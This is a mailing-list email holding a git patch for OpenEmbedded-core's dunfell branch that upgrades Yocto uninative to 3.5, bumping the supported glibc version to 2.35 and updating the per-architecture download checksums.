         4YPeEYuu1XYgQ5dB0Xbe3c/8ox9CRNR7WRvn4sQw4XkkvukxUR/yqlCokGV/D2IMo+bZ
         8Jjohyfya31WxYd6JVhz23JlJyL+81J1xurOPLB4sSWI/id4pDcWVOWtzC68DPXhYX8k
         qKtw==
X-Gm-Message-State: AOAM531C/PUGrLNMAQyz93U8XcTuUdDMItX5FeUezZtvhA1wID3TPxkw
	BCVVZwycvdz7YtKiWms5X6jgF2HVoAew7epxckw=
X-Google-Smtp-Source: 
 ABdhPJxLcvZeCDp/kcXDU2sb3kB/Iq/1dBxlxYWjusNYToazdXmyCyGX1ulF80T4xgNWpOIotCxhAA==
X-Received: by 2002:a17:902:d2ce:b0:151:6781:affa with SMTP id
 n14-20020a170902d2ce00b001516781affamr26770783plc.168.1646406325607;
        Fri, 04 Mar 2022 07:05:25 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.24
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:25 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 18/18] uninative: Upgrade to 3.5
Date: Fri,  4 Mar 2022 05:04:26 -1000
Message-Id: 
 <51844f2d60d77fb8cb46ffe460402f76ae216ca5.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:27 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162737

From: Michael Halstead <mhalstead@linuxfoundation.org>

Add support for glibc 2.35.

Signed-off-by: Michael Halstead <mhalstead@linuxfoundation.org>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 347b8c87fb4e2c398644f900728cf6e22ba4516d)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/conf/distro/include/yocto-uninative.inc | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 6833072cd3..bfe05ce1eb 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,10 +6,10 @@
 # to the distro running on the build machine.
 #
 
-UNINATIVE_MAXGLIBCVERSION = "2.34"
-UNINATIVE_VERSION = "3.4"
+UNINATIVE_MAXGLIBCVERSION = "2.35"
+UNINATIVE_VERSION = "3.5"
 
 UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
-UNINATIVE_CHECKSUM[aarch64] ?= "3013cdda8f0dc6639ce1c80f33eabce66f06b890bd5b58739a6d7a92a0bb7100"
-UNINATIVE_CHECKSUM[i686] ?= "abed500de584aad63ec237546db20cdd0c69d8870a6f8e94ac31721ace64b376"
-UNINATIVE_CHECKSUM[x86_64] ?= "126f4f7f6f21084ee140dac3eb4c536b963837826b7c38599db0b512c3377ba2"
+UNINATIVE_CHECKSUM[aarch64] ?= "6de0771bd21e0fcb5e80388e5b561a8023b24083bcbf46e056a089982aff75d7"
+UNINATIVE_CHECKSUM[i686] ?= "8c8745becbfa1c341bae839c7eab56ddf17ce36c303bcd73d3b2f2f788b631c2"
+UNINATIVE_CHECKSUM[x86_64] ?= "e8047a5748e6f266165da141eb6d08b23674f30e477b0e5505b6403d50fbc4b2"